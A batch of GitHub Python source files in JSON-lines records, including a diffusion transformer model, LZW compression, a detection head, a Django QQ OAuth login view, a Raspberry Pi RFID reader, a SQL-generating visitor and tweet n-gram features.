if config is None:\n config = AutoConfig.from_pretrained(config_name)\n config.hidden_dropout_prob = dropout\n\n self.input_dims = emb_dim\n self.hidden_t_dim = emb_dim\n self.output_dims = emb_dim\n self.vocab_size = vocab_size\n self.dropout = dropout\n self.logits_mode = logits_mode\n self.hidden_size = config.hidden_size\n\n self.word_embedding = nn.Embedding(self.vocab_size, self.input_dims)\n self.lm_head = nn.Linear(self.input_dims, self.vocab_size)\n with torch.no_grad():\n self.lm_head.weight = self.word_embedding.weight\n\n time_dim = emb_dim * 4\n\n self.random_or_learned_sinusoidal_cond = learned_sinusoidal_cond or random_fourier_features\n\n if self.random_or_learned_sinusoidal_cond:\n sinu_pos_emb = RandomOrLearnedSinusoidalPosEmb(learned_sinusoidal_dim, random_fourier_features)\n fourier_dim = learned_sinusoidal_dim + 1\n else:\n sinu_pos_emb = SinusoidalPosEmb(emb_dim)\n fourier_dim = emb_dim\n\n self.time_mlp = nn.Sequential(\n sinu_pos_emb,\n nn.Linear(fourier_dim, time_dim),\n nn.GELU(),\n nn.Linear(time_dim, config.hidden_size)\n )\n\n if self.input_dims != config.hidden_size:\n self.input_up_proj = nn.Sequential(nn.Linear(self.input_dims, config.hidden_size),\n nn.Tanh(),\n nn.Linear(config.hidden_size, config.hidden_size))\n\n if init_pretrained == 'bert':\n print('initializing from pretrained bert...')\n print(config)\n temp_bert = BertModel.from_pretrained(config_name, config=config)\n\n self.word_embedding = temp_bert.embeddings.word_embeddings\n with torch.no_grad():\n self.lm_head.weight = self.word_embedding.weight\n\n self.input_transformers = temp_bert.encoder\n self.register_buffer(\"position_ids\", torch.arange(config.max_position_embeddings).expand((1, -1)))\n self.position_embeddings = temp_bert.embeddings.position_embeddings\n self.LayerNorm = temp_bert.embeddings.LayerNorm\n\n del temp_bert.embeddings\n del temp_bert.pooler\n\n elif init_pretrained == 'no':\n self.input_transformers = BertEncoder(config)\n self.register_buffer(\"position_ids\", torch.arange(config.max_position_embeddings).expand((1, -1)))\n self.position_embeddings = nn.Embedding(config.max_position_embeddings, config.hidden_size)\n self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)\n\n else:\n assert False, \"invalid type of init_pretrained\"\n\n self.dropout = nn.Dropout(config.hidden_dropout_prob)\n\n if self.output_dims != config.hidden_size:\n self.output_down_proj = nn.Sequential(nn.Linear(config.hidden_size, config.hidden_size),\n nn.Tanh(), nn.Linear(config.hidden_size, self.output_dims))\n\n def forward(self, x, time):\n \"\"\"\n Apply the model to an input batch.\n :param x: an [N x C x ...] Tensor of inputs.\n :param t: an [N x 1] 1-D batch of timesteps.\n :return: an [N x C x ...] Tensor of outputs.\n \"\"\"\n emb_t = self.time_mlp(time)\n\n if self.input_dims != self.hidden_size:\n emb_x = self.input_up_proj(x)\n else:\n emb_x = x\n\n seq_length = x.size(1)\n position_ids = self.position_ids[:, : seq_length]\n emb_inputs = self.position_embeddings(position_ids) + emb_x + emb_t.unsqueeze(1).expand(-1, seq_length, -1)\n emb_inputs = self.dropout(self.LayerNorm(emb_inputs))\n\n input_trans_hidden_states = self.input_transformers(emb_inputs).last_hidden_state\n\n if self.output_dims != self.hidden_size:\n h = self.output_down_proj(input_trans_hidden_states)\n else:\n h = input_trans_hidden_states\n h = h.type(x.dtype)\n return h\n\n#from torchinfo import summary\nif __name__ == \"__main__\":\n model = Transformer(emb_dim=256, vocab_size=27)\n fake_data = torch.rand(1, 27, 256)\n #summary(model, input_data=[fake_data, torch.tensor([1])])","repo_name":"gfloto/dir_diff","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":17737,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"37833228707","text":"def compress_test(text):\n \"\"\"\n >>> text = 'TATAGATCTTAATATA'\n >>> compress_test(text)\n [84, 65, 256, 71, 257, 67, 84, 256, 257, 264]\n \"\"\"\n dictionary = []\n compressed_text = []\n\n for i in range(256):\n dictionary.append(chr(i))\n\n s = text[0]\n\n for i in range(1, len(text)):\n c = text[i]\n\n if s + c in dictionary:\n s = s + c\n else:\n index = dictionary.index(s)\n compressed_text.append(index)\n dictionary.append(s + c)\n s = c\n\n index = dictionary.index(s)\n compressed_text.append(index)\n\n return compressed_text\n\n\n","repo_name":"Michael-Wisniewski/algorithms-unlocked","sub_path":"chapter 8/2_LZW_compression.py","file_name":"2_LZW_compression.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6017971761","text":"import math\nfrom typing import Any, Callable, List, Tuple\n\nimport torch\nimport torch.nn.functional as F\nfrom torch import Tensor, nn\n\nfrom src.nn.common import StackedConv2dLayers\nfrom src.types import Features\n\nclass ScaleLayer(nn.Module):\n def __init__(self, init_value: float = 1.0):\n super().__init__()\n self.scale = nn.Parameter(torch.FloatTensor([init_value]))\n\n def forward(self, x: Tensor) -> Tensor:\n return x * self.scale\n\n\nclass Head(nn.Module):\n def __init__(\n self,\n in_channels: int,\n channels: int,\n num_classes: int,\n depth: int = 2,\n features_stride: List[int] = (4, 8, 16, 32),\n prior_prob: float = 0.01,\n ):\n \"\"\"\n Copied and adapter from OneNet: https://github.com/PeizeSun/OneNet/blob/main/projects/OneNet/onenet/head.py\n\n Args:\n in_channels (int): _description_\n channels (int): _description_\n num_classes (int): _description_\n depth (int, optional): _description_. Defaults to 2.\n features_stride (List[int], optional): _description_. Defaults to (4, 8, 16, 32).\n prior_prob (float, optional): _description_. Defaults to 0.01.\n \"\"\"\n super().__init__()\n self.features_stride = features_stride\n self.scales = nn.ModuleList(\n [ScaleLayer(init_value=1.0) for _ in features_stride]\n )\n self.num_classes = num_classes\n self.in_channels = in_channels\n\n self.class_prediction_branch = StackedConv2dLayers(in_channels, channels, depth)\n self.regression_prediction_branch = StackedConv2dLayers(\n in_channels, channels, depth\n )\n\n self.class_predictor = nn.Conv2d(\n channels, num_classes, kernel_size=3, stride=1, padding=1\n )\n self.bboxes_predictor = nn.Conv2d(\n channels, 4, kernel_size=3, stride=1, padding=1\n )\n\n # self.init_weights(prior_prob)\n\n # def init_weights(self):\n # # init all parameters.\n # for p in self.parameters():\n # if p.dim() > 1:\n # nn.init.xavier_uniform_(p)\n\n # # initialize the bias for focal loss.\n # nn.init.constant_(self.cls_score.bias, -math.log((1 - prior_prob) / prior_prob))\n\n def forward(self, features: Features) -> Tuple[Tensor]:\n \"\"\"\n\n Args:\n features (List[Tensor] of shape `(batch_size, channels, height, width)`): List of features the head uses\n\n Returns:\n Tuple[Tensor]: Tuple of Tensors of shape (`batch_size, num_queries, num_classes`) and (`batch_size, num_queries, 4)` representing the class logits and the predicted bboxes respectively. The predicted bboxes are explicit xyxy coordinates with respect of the original image\n \"\"\"\n class_logits_all: List[Tensor] = []\n bboxes_predictions_all: List[Tensor] = []\n batch_size = features[0].shape[0]\n\n for feature, feature_stride, scale in zip(\n features, self.features_stride, self.scales\n ):\n # classes\n class_features = self.class_prediction_branch(feature)\n class_logits = self.class_predictor(class_features).view(\n batch_size, self.num_classes, -1\n )\n # bboxes\n regression_features = self.regression_prediction_branch(feature)\n locations_on_grid = self.get_locations_on_grid(feature, feature_stride)[\n None\n ]\n # bboxes here are center points for each cell, so the coodinares are (cx,cy,h,w)\n bboxes_predictions = self.bboxes_predictor(regression_features)\n # rescale bboxes by a learnable parameter\n bboxes_predictions = scale(bboxes_predictions)\n # rescale bboxes based on the level stride and force them to be [0,1]\n bboxes_predictions = F.relu(bboxes_predictions) * feature_stride\n # now the use locations_on_grid to get back the bboxes location on the image\n bboxes_predictions = self.to_xyxy_bboxes(\n locations_on_grid, bboxes_predictions\n ).view(batch_size, 4, -1)\n\n class_logits_all.append(class_logits)\n bboxes_predictions_all.append(bboxes_predictions)\n\n class_logits_all = (\n torch.cat(class_logits_all, dim=-1).permute(0, 2, 1).contiguous()\n )\n bboxes_predictions_all = (\n torch.cat(bboxes_predictions_all, dim=-1).permute(0, 2, 1).contiguous()\n )\n\n return class_logits_all, bboxes_predictions_all\n\n def to_xyxy_bboxes(self, locations: Tensor, pred_ltrb: Tensor) -> Tensor:\n \"\"\"\n :param locations: (1, 2, H, W)\n :param pred_ltrb: (N, 4, H, W)\n \"\"\"\n\n pred_boxes = torch.zeros_like(pred_ltrb)\n pred_boxes[:, 0, :, :] = locations[:, 0, :, :] - pred_ltrb[:, 0, :, :] # x1\n pred_boxes[:, 1, :, :] = locations[:, 1, :, :] - pred_ltrb[:, 1, :, :] # y1\n pred_boxes[:, 2, :, :] = locations[:, 0, :, :] + pred_ltrb[:, 2, :, :] # x2\n pred_boxes[:, 3, :, :] = locations[:, 1, :, :] + pred_ltrb[:, 3, :, :] # y2\n\n return pred_boxes\n\n @torch.no_grad()\n def get_locations_on_grid(self, features: Tensor, stride: int) -> Tensor:\n \"\"\"\n This code essentially computes the (x, y) coordinates of the center points of evenly spaced cells in a grid, given the height and width of the grid and the stride between the cells.\n\n Arguments:\n features: (N, C, H, W)\n Return:\n locations: (2, H, W)\n \"\"\"\n\n h, w = features.size()[-2:]\n dtype, device = features.dtype, features.device\n # if stride is 8\n # [0, 8, 16, 24 ...]\n shifts_x = torch.arange(0, w * stride, step=stride, dtype=dtype, device=device)\n shifts_y = torch.arange(0, h * stride, step=stride, dtype=dtype, device=device)\n shift_y, shift_x = torch.meshgrid(shifts_y, shifts_x)\n shift_x = shift_x.reshape(-1)\n shift_y = shift_y.reshape(-1)\n locations_on_grid = torch.stack((shift_x, shift_y), dim=1) + stride // 2\n\n locations_on_grid = locations_on_grid.reshape(h, w, 2).permute(2, 0, 1)\n\n return locations_on_grid\n\n\nif __name__ == \"__main__\":\n # layers = StackedConv2dLayers(32, 64)\n # print(layers)\n\n head = Head(256, channels=256, num_classes=80)\n outs = head(\n [\n torch.randn((1, 256, 80, 80)),\n torch.randn((1, 256, 40, 40)),\n torch.randn((1, 256, 20, 20)),\n torch.randn((1, 256, 10, 10)),\n torch.randn((1, 256, 5, 5)),\n ]\n )\n\n print(outs[0].shape, outs[1].shape)\n","repo_name":"FrancescoSaverioZuppichini/detector","sub_path":"src/models/yoto/head.py","file_name":"head.py","file_ext":"py","file_size_in_byte":6720,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"32"} +{"seq_id":"5627609808","text":"import urlparse\n\nfrom django.contrib.auth import authenticate\nfrom django.template.response import TemplateResponse\nfrom django.utils.translation import ugettext as _\n\n\nfrom bkauth.constants import REDIRECT_FIELD_NAME\nfrom bkauth import actions\nfrom bkauth.forms import BkAuthenticationForm\nfrom bkauth.utils import set_bk_token_invalid\nfrom common.log import logger\nfrom common.exceptions import AuthenticationError\n\nfrom .utils import gen_oauth_login_url\n\ndef login(request):\n \"\"\"\n 登录处理\n \"\"\"\n\n template_name = \"account/login_ce_qq.html\"\n\n # QQ登录回调后会自动添加code参数\n code = request.GET.get('code', None)\n\n # GET 请求中query param携带code,认为是QQ登录回调后的请求\n if code and request.method == \"GET\":\n return _qq_login(request=request,\n code=code,\n template_name=template_name,\n )\n else:\n # 蓝鲸账号密码登录由_bk_login处理\n return _bk_login(request=request, \n authentication_form=BkAuthenticationForm, \n template_name=template_name\n )\n\ndef _bk_login(request, authentication_form, template_name):\n \"\"\"\n 处理蓝鲸账号密码登录页面和登录动作:\n \"\"\"\n\n error_message = \"\"\n\n # 获取用户实际请求的URL, 目前account.REDIRECT_FIELD_NAME = 'c_url'\n redirect_to = request.GET.get(REDIRECT_FIELD_NAME, '')\n # 获取用户实际访问的蓝鲸应用\n app_id = request.POST.get(\"app_id\", request.GET.get(\"app_id\", \"\"))\n\n # POST\n if request.method == \"POST\":\n form = authentication_form(request, data=request.POST)\n try:\n if form.is_valid():\n logger.info(\"_bk_login user: %s\"%request.POST['username'])\n return actions.login_success_response(request, form, redirect_to, app_id)\n except AuthenticationError as e:\n error_message = e.message\n else:\n error_message = _(u\"账户或者密码错误,请重新输入\")\n else:\n form = authentication_form(request)\n\n qq_auth_url, state = gen_oauth_login_url({\n \"c_url\": redirect_to,\n \"app_id\": app_id\n })\n logger.debug(\"qq_auth_url is {}\".format(qq_auth_url))\n logger.debug(\"state is {}\".format(state))\n\n context = {\n \"form\": form,\n \"error_message\": error_message,\n REDIRECT_FIELD_NAME: redirect_to,\n \"app_id\": app_id,\n \"is_plain\": request.path_info == \"/plain/\",\n \"qq_auth_url\": qq_auth_url\n }\n request.session[\"state\"] = state\n response = TemplateResponse(request, template_name, context)\n response = set_bk_token_invalid(request, response)\n return response\n\ndef _qq_login(request, code, template_name):\n\n state = request.GET.get(\"state\", \"\")\n state_dict = dict(urlparse.parse_qsl(state))\n app_id = state_dict.get(\"app_id\")\n redirect_to = state_dict.get(REDIRECT_FIELD_NAME, \"\")\n qq_auth_url, new_state = gen_oauth_login_url({\n \"c_url\": redirect_to,\n \"app_id\": app_id\n })\n logger.debug(\"qq_auth_url is {}\".format(qq_auth_url))\n logger.debug(\"new_state is {}\".format(new_state))\n\n error_message = \"\"\n context = {\n \"error_message\": error_message,\n REDIRECT_FIELD_NAME: redirect_to,\n \"app_id\": app_id,\n \"is_plain\": request.path_info == \"/plain/\",\n \"qq_auth_url\": qq_auth_url\n }\n\n state = request.GET.get(\"state\", \"\")\n state_from_session = request.session.get(\"state\", \"\")\n\n # 校验state,防止csrf攻击\n if state != state_from_session:\n error_message = u\"state校验失败,请重新登录或联系管理员\"\n logger.debug(\n \"custom_login:qrcode.qq state != state_from_session [state=%s, state_from_session=%s]\",\n state,\n state_from_session,\n )\n\n context[\"error_message\"] = error_message\n return _qq_login_failed_response(request=request,\n template_name=template_name,\n context=context,\n state=new_state)\n\n user = authenticate(code=code)\n if user is None:\n error_message = u\"qq用户不存在\"\n logger.debug(\"custom_login: qrcode.qq user is None\")\n context[\"error_message\"] = error_message\n return _qq_login_failed_response(request=request,\n template_name=template_name,\n context=context,\n state=new_state)\n\n # 成功,则调用蓝鲸登录成功的处理函数,并返回响应\n logger.info(\"_qq_login user: %s\"%user)\n logger.debug(\"custom_login:qrcode.qq login success, will redirect_to=%s\", redirect_to)\n return actions.login_success_response(request, user, redirect_to, app_id)\n \ndef _qq_login_failed_response(request, template_name, context, state):\n \"\"\"\n qq登录失败响应\n \"\"\"\n request.session[\"state\"] = state\n response = TemplateResponse(request, template_name, context)\n response = set_bk_token_invalid(request, response)\n return response\n","repo_name":"wenchao-h/bk-qq-login","sub_path":"ee_official_login/qrcode/qq/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25168202899","text":"#!/usr/bin/python3\nif __name__ == \"__main__\":\n import sys\n from calculator_1 import add, sub, mul, div\n\n argc = len(sys.argv)\n if argc != 4:\n print(\"Usage: {} \".format(sys.argv[0]))\n sys.exit(1)\n argI1 = int(sys.argv[1])\n argI3 = int(sys.argv[3])\n if sys.argv[2] == \"+\":\n print(\"{} + {} = {}\".format(argI1, argI3, add(argI1, argI3)))\n\n elif sys.argv[2] == \"-\":\n print(\"{} - {} = {}\".format(argI1, argI3, sub(argI1, argI3)))\n\n elif sys.argv[2] == \"*\":\n print(\"{} * {} = {}\".format(argI1, argI3, mul(argI1, argI3)))\n\n elif sys.argv[2] == \"/\":\n print(\"{} / {} = {}\".format(argI1, argI3, div(argI1, argI3)))\n else:\n print(\"Unknown operator. Available operators: +, -, * and /\")\n exit(1)\n","repo_name":"MoedCode/alx-higher_level_programming","sub_path":"0x02-python-import_modules/100-my_calculator.py","file_name":"100-my_calculator.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13625434422","text":"'''\r\n Developed by Krishnakumar Karuppasamy\r\n version 2.0\r\n 17-12-2018\r\n Documentation link \r\n'''\r\nimport pymysql as p\r\nfrom RPLCD import CharLCD\r\nimport RPi.GPIO as GPIO\r\nimport MFRC522\r\nfrom urllib2 import urlopen\r\n\r\n\r\nframebuffer = [\r\n '',\r\n '',\r\n ]\r\n\r\nlcd = CharLCD(cols=16, rows=2, pin_rs=37, pin_e=35, pins_data=[33, 31, 29, 18])\r\n\r\ndef write_to_lcd(lcd, framebuffer, num_cols): \r\n lcd.home()\r\n for row in framebuffer:\r\n lcd.write_string(row.ljust(num_cols)[:num_cols])\r\n lcd.write_string('\\r\\n')\r\n\r\n#inistialize the buffer of screen\r\nwrite_to_lcd(lcd, framebuffer, 16)\r\n\r\n#display value to LCD \r\ndef lcdDisplay(long_string):\r\n lcd.clear()\r\n def loop_string(string, lcd, framebuffer, row, num_cols, delay=0.2): #DELAY= CONTROLS THE SPEED OF SCROLL\r\n padding = ' ' * num_cols\r\n s = padding + string + padding\r\n for i in range(len(s) - num_cols + 1):\r\n framebuffer[row] = s[i:i+num_cols]\r\n write_to_lcd(lcd, framebuffer, num_cols)\r\n time.sleep(delay)\r\n\r\n loop_string(long_string, lcd, framebuffer, 1, 16)\r\n\r\n\r\n#delay for mysql server start \r\ntime.sleep(5)\r\n\r\n# Open database connection\r\ndb = p.connect(\"127.0.0.1\",\"root\",\"admin\",\"sit_iot\" )\r\n\r\n\r\n# prepare a cursor object using cursor() method\r\ncursor = db.cursor()\r\n\r\n# Create an object of the class MFRC522\r\nMIFAREReader = MFRC522.MFRC522()\r\n\r\n# Welcome message\r\nprint (\"Welcome to SIT RFID Portal\")\r\n\r\n#send to server\r\ndef sendToServer(uid, name):\r\n value=uid.replace(' ','')\r\n name=name.replace(' ','%20') \r\n try:\r\n print ('server function')\r\n #print (urlopen('your server and values')\r\n \r\n except:\r\n print ('cannot send')\r\n\r\n#check whether network available or not\r\ndef networkChecking():\r\n try:\r\n urlopen('http://172.217.194.106',timeout=2)\r\n return True\r\n except:\r\n return False\r\n\r\n#validate the UID from user\r\ndef validate(uid):\r\n uid=str(uid)\r\n uid=uid.replace(' ','') \r\n getResult=cursor.execute(\"select * from employee_details where uid='%s'\" %(uid))\r\n result = cursor.fetchone() \r\n if getResult:\r\n print('name %s' %result[1])\r\n #lcdDisplay(result[1])\r\n if networkChecking(): \r\n print('network available') \r\n #sendToServer(uid,result[1])\r\n else:\r\n print('network failuer')\r\n #lcdDisplay('network failure')\r\n else:\r\n print('not register')\r\n #GPIO.output(12,1) #display light result\r\n #lcdDisplay('un authorized')\r\n #time.sleep(1)\r\n #GPIO.output(11,0)\r\n \r\n\r\n# This loop keeps checking for chips. If one is near it will get the UID and authenticate\r\nwhile True:\r\n\r\n # Scan for cards\r\n (status,uid) = MIFAREReader.MFRC522_Anticoll()\r\n\r\n # If we have the UID, continue\r\n if status == MIFAREReader.MI_OK:\r\n print(str(uid)+' is your id')\r\n #GPIO.output(11,1) #display light result\r\n #time.sleep(1)\r\n #GPIO.output(11,0)\r\n validate(uid) ","repo_name":"kisnami/RFID_SIT","sub_path":"RFID_Reader.py","file_name":"RFID_Reader.py","file_ext":"py","file_size_in_byte":3129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26463281964","text":"from transform_generator.parser.ast.paren_exp import ParenExp\nfrom transform_generator.parser.ast.aliased_result_col import AliasedResultCol\nfrom transform_generator.parser.ast.between import Between\nfrom transform_generator.parser.ast.bin_op import BinOp\nfrom transform_generator.parser.ast.case import Case\nfrom transform_generator.parser.ast.cast import Cast\nfrom transform_generator.parser.ast.field import Field\nfrom transform_generator.parser.ast.from_clause import FromClause\nfrom transform_generator.parser.ast.function_call import FunctionCall\nfrom transform_generator.parser.ast.group_by_clause import GroupByClause\nfrom transform_generator.parser.ast.in_clause import InClause\nfrom transform_generator.parser.ast.join import Join\nfrom transform_generator.parser.ast.unary_exp import UnaryExp\nfrom transform_generator.parser.ast.null_literal import NullLiteral\nfrom transform_generator.parser.ast.integer_literal import IntegerLiteral\nfrom transform_generator.parser.ast.select_query import SelectQuery\nfrom transform_generator.parser.ast.string_literal import StringLiteral\nfrom transform_generator.parser.ast.transform_exp import TransformExp\nfrom transform_generator.parser.ast.window_function_call import WindowFunctionCall\nfrom transform_generator.parser.keywords import keywords\n\nfrom .ast_visitor import AstVisitor\nfrom ..ast.decimal_literal import DecimalLiteral\nfrom ..ast.environment_variable import EnvironmentVariable\n\n\nclass GenericSqlVisitor(AstVisitor):\n def __init__(self):\n self.clear()\n\n def clear(self):\n self._indent_level = 0\n self._sql_string = \"\"\n self._begin_line = True\n\n @property\n def sql_string(self):\n return self._sql_string\n\n def _indent(self):\n self._indent_level += 1\n\n def _unindent(self):\n self._indent_level -= 1\n\n def _emit(self, output_str):\n if self._begin_line:\n for x in range(0, self._indent_level):\n self._sql_string += \"\\t\"\n self._begin_line = False\n\n self._sql_string += output_str\n\n def _end_line(self):\n self._sql_string += \"\\n\"\n self._begin_line = True\n\n def _get_database_name(self, database_name: str, table_name: str):\n database_table_name = \"\"\n if database_name:\n database_table_name = database_name + \".\"\n if table_name[0] == '_':\n table_name = '`' + table_name + '`'\n database_table_name += table_name\n return database_table_name\n\n def visit_aliased_result_col(self, aliased_result_col: AliasedResultCol):\n aliased_result_col.exp.accept(self)\n\n if aliased_result_col.alias:\n self._emit(\" AS \" + aliased_result_col.alias)\n\n def visit_between(self, between: Between):\n between.test_exp.accept(self)\n\n if between.not_modifier:\n self._emit(\" NOT\")\n self._emit(\" BETWEEN \")\n between.begin_exp.accept(self)\n self._emit(\" AND \")\n between.end_exp.accept(self)\n\n def visit_bin_op(self, bin_op: BinOp):\n bin_op.left.accept(self)\n self._emit(\" \" + bin_op.op + \" \")\n bin_op.right.accept(self)\n\n def visit_case(self, case: Case):\n self._emit(\"CASE\")\n if case.exp:\n self._emit(\" \")\n case.exp.accept(self)\n self._end_line()\n\n for condition, result_exp in case.when_clauses:\n self._emit(\"WHEN \")\n condition.accept(self)\n self._emit(\" THEN \")\n result_exp.accept(self)\n self._end_line()\n\n if case.else_clause:\n self._emit(\"ELSE \")\n case.else_clause.accept(self)\n self._end_line()\n\n self._emit(\"END\")\n\n def visit_cast(self, cast: Cast):\n self._emit(\"CAST(\")\n cast.parameter.accept(self)\n self._emit(\" AS \" + cast.data_type + \")\")\n\n def visit_decimal_literal(self, decimal_literal: DecimalLiteral):\n self._emit(str(decimal_literal.value))\n\n def visit_environment_variable(self, environment_variable: EnvironmentVariable):\n self._emit('${')\n self._emit(environment_variable.env_var)\n self._emit('}')\n\n def visit_field(self, field: Field):\n if field.field_name.lower() in keywords() or field.field_name[0] == '_':\n result = '`' + field.field_name + '`'\n else:\n result = field.field_name\n if field.table_name is not None:\n result = \"`\" + field.table_name + \"`\" if field.table_name[0] == \"_\" else field.table_name + \".\" + result\n self._emit(result)\n\n def visit_from_clause(self, from_clause: FromClause):\n database_table_name = self._get_database_name(from_clause.database_name, from_clause.table_name)\n\n self._emit(\"FROM \" + database_table_name)\n\n if from_clause.alias:\n self._emit(\" AS \" + from_clause.alias)\n\n for join in from_clause.joins:\n self._end_line()\n join.accept(self)\n\n def visit_function_call(self, function_call: FunctionCall):\n self._emit(function_call.name + \"(\")\n if function_call.distinct:\n self._emit(\"DISTINCT \")\n if function_call.asterisk:\n self._emit(\"*\")\n elif function_call.parameters:\n count = 0\n for param in function_call.parameters:\n if count > 0:\n self._emit(\", \")\n param.accept(self)\n count += 1\n self._emit(\")\")\n\n def visit_group_by_clause(self, group_by_clause: GroupByClause):\n self._emit(\"GROUP BY \")\n\n count = 0\n for exp in group_by_clause.exp_list:\n if count > 0:\n self._emit(\", \")\n exp.accept(self)\n count += 1\n\n if group_by_clause.having_exp:\n self._emit(\" HAVING \")\n group_by_clause.having_exp.accept(self)\n\n def visit_in_clause(self, in_clause: InClause):\n self._emit(str(in_clause.exp) + \" \")\n if in_clause.not_in:\n self._emit(\"NOT \")\n self._emit(\"IN (\" + \", \".join([str(exp) for exp in in_clause.exp_list]) + \")\")\n\n def visit_integer_literal(self, integer_literal: IntegerLiteral):\n self._emit(str(integer_literal.value))\n\n def visit_join(self, join: Join):\n database_table_name = self._get_database_name(join.database_name, join.table_name)\n\n if join.operator:\n self._emit(join.operator + \" \")\n self._emit(\"JOIN \")\n\n self._emit(database_table_name)\n\n if join.alias:\n self._emit(\" AS \" + join.alias)\n\n if join.condition:\n self._emit(\" ON \")\n join.condition.accept(self)\n\n def visit_not_exp(self, unary_exp: UnaryExp):\n self._emit(unary_exp.op + ' ')\n unary_exp.exp.accept(self)\n\n def visit_null_literal(self, null_literal: NullLiteral):\n self._emit(str(null_literal))\n\n def visit_paren_exp(self, paren_exp: ParenExp):\n self._emit('(')\n paren_exp.exp.accept(self)\n self._emit(')')\n\n def _after_where_clause(self, select_query):\n pass\n\n def _no_where_clause(self, select_query):\n pass\n\n def visit_select_query(self, select_query: SelectQuery):\n self._emit(\"SELECT\")\n\n if select_query.distinct:\n self._emit(\" DISTINCT\")\n self._indent()\n\n count = 0\n for col in select_query.result_columns:\n if count > 0:\n self._emit(\",\")\n self._end_line()\n col.accept(self)\n count += 1\n\n self._unindent()\n\n if select_query.from_clause:\n self._end_line()\n select_query.from_clause.accept(self)\n\n if select_query.where_clause:\n self._end_line()\n self._emit(\"WHERE \")\n select_query.where_clause.accept(self)\n self._after_where_clause(select_query)\n else:\n self._no_where_clause(select_query)\n\n if select_query.group_by_clause:\n self._end_line()\n select_query.group_by_clause.accept(self)\n\n def visit_string_literal(self, string_literal: StringLiteral):\n self._emit(\"'\" + string_literal.value + \"'\")\n\n def visit_transform_exp(self, transform_exp: TransformExp):\n super().visit_transform_exp(transform_exp)\n\n def visit_window_function_call(self, window_function_call: WindowFunctionCall):\n window_function_call.function_call.accept(self)\n self._emit(\" OVER (\")\n\n if len(window_function_call.partition_by) > 0:\n self._emit(\"PARTITION BY \")\n count = 0\n for exp in window_function_call.partition_by:\n if count > 0:\n self._emit(\", \")\n exp.accept(self)\n count += 1\n\n if len(window_function_call.order_by) > 0:\n if len(window_function_call.partition_by) > 0:\n self._emit(\" \")\n self._emit(\"ORDER BY \")\n count = 0\n for exp, direction in window_function_call.order_by:\n if count > 0:\n self._emit(\", \")\n exp.accept(self)\n if direction is not None:\n self._emit(\" \" + direction)\n count += 1\n self._emit(\")\")\n","repo_name":"johnsonandjohnson/transformation_generator","sub_path":"transform_generator/parser/visitor/generic_sql_visitor.py","file_name":"generic_sql_visitor.py","file_ext":"py","file_size_in_byte":9307,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"24275997056","text":"#Import the preprocessing and twokenize files.\r\nimport nltk\r\nimport re\r\nfrom nltk.corpus import stopwords\r\nfrom collections import defaultdict\r\n\r\n\r\n\r\n#Get the features - unigrams\r\ndef getUnigramsVector(tweetText,stop):\r\n\r\n unigramsVector = []\r\n for w in tweetText:\r\n \t#check if the word stats with an alphabet\r\n \tval = re.search(r\"^[a-zA-Z][a-zA-Z0-9]*$\", w)\r\n \t#ignore if it is a stop word\r\n \tif(w in stop or val is None):\r\n \t\tcontinue\r\n \telse:\r\n \t\tunigramsVector.append(w.lower())\r\n\r\n return unigramsVector\r\n\r\n#Function to display the most common unigram features\r\ndef getUnigramsUse(featureList):\r\n\r\n\r\n Unigrams = {}\r\n UnigramsUse = {}\r\n\r\n #Counting the number of times the feature appears\r\n for item in featureList:\r\n try:\r\n Unigrams[item]+=1\r\n except:\r\n Unigrams[item]=1\r\n\r\n #Use only those unigrams which have count > 7\r\n for k,v in Unigrams.iteritems():\r\n if v >= 5:\r\n UnigramsUse[k]= v\r\n\r\n return UnigramsUse\r\n\r\ndef getUnigramsFeatures(UnigramsUse,tweets):\r\n\r\n\r\n unigrams_dict = defaultdict(list)\r\n \r\n #Check the tweet text for the UnigramsUse, if it exists the value is one else 0\r\n for key in sorted(tweets):\r\n text = tweets[key]\r\n text = set(text)\r\n for keys,values in UnigramsUse.iteritems():\r\n if keys in text:\r\n unigrams_dict[key].append(1)\r\n else:\r\n unigrams_dict[key].append(0)\r\n\r\n return unigrams_dict\r\n\r\n#Get the features Bigrams\r\ndef getBigramsVector(tweetText,stop):\r\n\r\n bigramsVector = []\r\n my_bigrams = nltk.bigrams(tweetText)\r\n for item in my_bigrams:\r\n\r\n val1 = re.search(r\"^[a-zA-Z][a-zA-Z0-9]*$\", item[0])\r\n val2 = re.search(r\"^[a-zA-Z][a-zA-Z0-9]*$\", item[1])\r\n\r\n if(item[0] in stop or val1 is None ) or (item[1] in stop or val2 is None):\r\n continue\r\n else:\r\n item[0].lower() \r\n item[1].lower()\r\n bigramsVector.append(item)\r\n\r\n return bigramsVector\r\n\r\n#Function to display the most common bigram features\r\ndef getBigramsUse(bigramsList):\r\n\r\n Bigrams ={}\r\n bigramsUse = {} \r\n\r\n for item in bigramsList:\r\n try:\r\n Bigrams[item]+=1\r\n except:\r\n Bigrams[item]=1\r\n\r\n #print Bigrams\r\n\r\n for k,v in Bigrams.iteritems():\r\n if v >= 3:\r\n bigramsUse[k]= v\r\n\r\n return bigramsUse\r\n\r\ndef getBigramsFeatures(bigramsUse,tweets,stop):\r\n\r\n bigrams_dict = defaultdict(list)\r\n\r\n for key in sorted(tweets):\r\n text = tweets[key]\r\n bigramTweet = getBigramsVector(text,stop)\r\n for keys,values in bigramsUse.iteritems():\r\n if keys in bigramTweet: \r\n bigrams_dict[key].append(1)\r\n else:\r\n bigrams_dict[key].append(0)\r\n\r\n return bigrams_dict\r\n\r\n\r\n ","repo_name":"spiros166/TweetSentiment","sub_path":"Part_B/ngrams.py","file_name":"ngrams.py","file_ext":"py","file_size_in_byte":2895,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} 